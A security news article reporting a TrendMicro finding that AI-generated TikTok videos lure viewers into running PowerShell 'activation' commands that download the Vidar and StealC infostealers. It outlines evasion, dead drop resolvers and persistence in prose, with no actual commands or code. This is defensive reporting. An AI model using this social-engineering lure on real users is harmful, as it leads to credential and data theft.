Home > Security > Security News

TikTok Infostealer Campaign Distributes Vidar and StealC via AI-Generated Videos

Published
Written by:
Lore Apostol
Lore Apostol
Cybersecurity & Streaming Writer
TikTok logo with "O" depicting a stop sign

A novel infostealer campaign leverages TikTok’s wide reach and algorithmic virality to distribute the Vidar Stealer and StealC. Cybercriminals rely on social engineering, convincing users they are activating Windows, Microsoft Office, and premium features in CapCut and Spotify.

Unlike traditional malware campaigns relying on phishing emails or compromised websites, attackers are now turning to TikTok, using AI-generated videos to deliver their payload, the most recent TrendMicro report says.

Threat actors create highly produced, faceless TikTok videos, often featuring AI-generated voices, instructing viewers on how to "activate" popular software such as Windows, Office, or Spotify. 

Screenshots showing the widespread exposure and potential impact of the campaign
Screenshots showing the widespread exposure and potential impact of the campaign | Source: TrendMicro 

The purported activation process requires users to run specific PowerShell commands as shown in the videos. Unbeknownst to the user, these PowerShell scripts fetch and execute malware-laden payloads from attacker-controlled servers.

The infection chain of the campaigns that lead to the Vidar and StealC malware
The infection chain of the campaigns that lead to the Vidar and StealC malware | Source: TrendMicro

Notably, the malicious process is entirely social-engineered; no executable code is embedded directly on TikTok. Instead, actionable instructions are delivered through the video, making it harder for platform-based security solutions to detect. 

Contents of Steam profile leveraged as DDR
Contents of Steam profile leveraged as DDR | Source: TrendMicro

Upon execution, the PowerShell command creates hidden folders and alters security settings to evade detection.

It then downloads and runs Vidar or StealC malware, leveraging legitimate services like Steam and Telegram as Dead Drop Resolvers (DDR) to disguise command-and-control (C2) communications.

The attackers also establish persistence through registry modifications and clean traces to avoid forensic discovery.

These infostealers target a range of credentials and sensitive data, posing a serious risk to individual users and enterprises alike.

Add a Comment
Related
Ransomware Developer Arrest
US Indicts 16 Russian Nationals in DanaBot Case as Part of Global Operation Endgame
Russia-Aligned TAG-110 Evolves Spear-Phishing Tactics in Tajikistan
Anonymous hacker carrying out an attack in a server room
Qakbot Malware Leader Indicted in Global Law Enforcement Operation
Coinbase cryptocurrency market
Over 69,000 Customers Impacted in Recently Revealed 2024 Coinbase Security Breach
Cloudflare DDoS
Fake Cloudflare Verification Attack Targets WordPress Sites with Advanced Multi-Stage Malware
Microsoft
Critical Privilege Escalation Flaw Found in Microsoft Active Directory dMSA Feature
Most Popular
Lilo and Nani in Lilo & Stitch
Lilo & Stitch (2025) Live-Action film: Ending Explained, Post-Credit Scene Revealed, and more
Ransomware Developer Arrest
US Indicts 16 Russian Nationals in DanaBot Case as Part of Global Operation Endgame
Fountain of Youth
Fountain of Youth Ending Explained: Owen’s fate, Fountain’s Mechanic, and more  
Russia-Aligned TAG-110 Evolves Spear-Phishing Tactics in Tajikistan
Julianne Moore in Sirens
Sirens: Where was the Julianne Moore and Milly Alcock Starrer show Filmed?
Sirens
Sirens Netflix Ending Explained: Michaela’s Freedom, Simone’s False Victory, Season 2 Possibilities, and more  
Lilo & Stitch (2025) Live-Action film: Ending Explained, Post-Credit Scene Revealed, and more
US Indicts 16 Russian Nationals in DanaBot Case as Part of Global Operation Endgame
Fountain of Youth Ending Explained: Owen’s fate, Fountain’s Mechanic, and more  
Russia-Aligned TAG-110 Evolves Spear-Phishing Tactics in Tajikistan
Sirens: Where was the Julianne Moore and Milly Alcock Starrer show Filmed?
Sirens Netflix Ending Explained: Michaela’s Freedom, Simone’s False Victory, Season 2 Possibilities, and more  

Most Popular
Lilo and Nani in Lilo & Stitch
Lilo & Stitch (2025) Live-Action film: Ending Explained, Post-Credit Scene Revealed, and more
Ransomware Developer Arrest
US Indicts 16 Russian Nationals in DanaBot Case as Part of Global Operation Endgame
Fountain of Youth
Fountain of Youth Ending Explained: Owen’s fate, Fountain’s Mechanic, and more  
Russia-Aligned TAG-110 Evolves Spear-Phishing Tactics in Tajikistan
Julianne Moore in Sirens
Sirens: Where was the Julianne Moore and Milly Alcock Starrer show Filmed?
Sirens
Sirens Netflix Ending Explained: Michaela’s Freedom, Simone’s False Victory, Season 2 Possibilities, and more  
Lilo & Stitch (2025) Live-Action film: Ending Explained, Post-Credit Scene Revealed, and more
US Indicts 16 Russian Nationals in DanaBot Case as Part of Global Operation Endgame
Fountain of Youth Ending Explained: Owen’s fate, Fountain’s Mechanic, and more  
Russia-Aligned TAG-110 Evolves Spear-Phishing Tactics in Tajikistan
Sirens: Where was the Julianne Moore and Milly Alcock Starrer show Filmed?
Sirens Netflix Ending Explained: Michaela’s Freedom, Simone’s False Victory, Season 2 Possibilities, and more  

TechNadu keeps you informed with the latest in cybersecurity, VPNs, streaming, and technology. From expert guides to in-depth reviews, we provide the knowledge you need to stay secure and connected in the digital world.

© 2025 TechNadu. All Rights Reserved. TechNadu is a part of Leaprove Media LLP.

Close lightbox
Facebook
Twitter
Linkedin
Reddit
Email
Copy Link
For a better user experience we recommend using a more modern browser. We support the latest version of the following browsers: For a better user experience we recommend using the latest version of the following browsers: